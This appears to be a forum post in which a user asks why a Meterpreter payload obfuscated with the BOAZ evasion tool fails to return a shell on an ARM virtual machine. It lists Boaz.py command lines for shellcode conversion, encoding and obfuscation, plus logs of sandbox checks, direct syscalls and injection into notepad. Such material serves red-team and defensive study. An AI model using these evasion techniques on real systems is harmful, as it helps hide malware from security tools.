Hello! I have a Meterpreter payload that returns a shell when run on my Apple silicon (ARM) VM. When I obfuscate it with BOAZ, the exe runs but I do not get a shell. Will being run on Apple silicon affect the obfuscation techniques?
These are the techniques I have tried:
- python3 Boaz.py -f /host_home/Boaz_beta/payload.exe -o ./output/boaz_output.exe -t donut -l 16 -e uuid -c akira
- python3 Boaz.py -f ~/testing_payloads/payload.exe -o ./boaz_output.exe -t donut -obf -l 1 -c pluto -e uuid
- python3 Boaz.py -f payload.exe -o output.exe -t donut -l 1 -c mingw -e uuid -obf -entropy 1 -a
Here are some log examples:
- log from technique 3
Executing godFather...
God father check passed. Execution seems normal.
Executing godMother...
God mother check passed. Execution seems normal.
Time2 check passed. Execution seems normal.
Executing fs1...
Failed to create file for writing.
Executing fs2...
DLL check passed.
time3: No matrix detected. The counter reached the expected value.
Executing instrumentation9...
No instrumentation detected based on parent process name.
Executing network445...
Connected to port 445, no matrix detected.
Processor mask for NUMA node 0: 15
VirtualAllocExNuma succeeded
Getting processor mask for NUMA node 0: 15
Executable name is the same.
Most checks passed. Continuing execution.
[+] MagicCodePtr size: 8 bytes
[+] size of magiccode: 104992 bytes
First 8 bytes: e8 0a 38 01 00 0a 38 01
Last 8 bytes: 00 00 00 00 00 00 00 90
[+] Searching for syscall #1 in NtAllocateVirtualMemory @ 00007fff12898f60
[+] Found syscall #1 for NtAllocateVirtualMemory at 00007fff12898f72
[+] Found syscall number: 24
[+] press enter to allocate memory
[+] Alloca
- log for technique 1
[+] MagicCodePtr size: 8 bytes
[+] size of magiccode: 104992 bytes
[-] PID not provided
Notepad started with default settings.
[+] notepad PID: 9244
[+] Classic execution starts, all userland calls.
[+] Shellcode is located at: 000001e9aa220000
[-] magiccode execution wait failed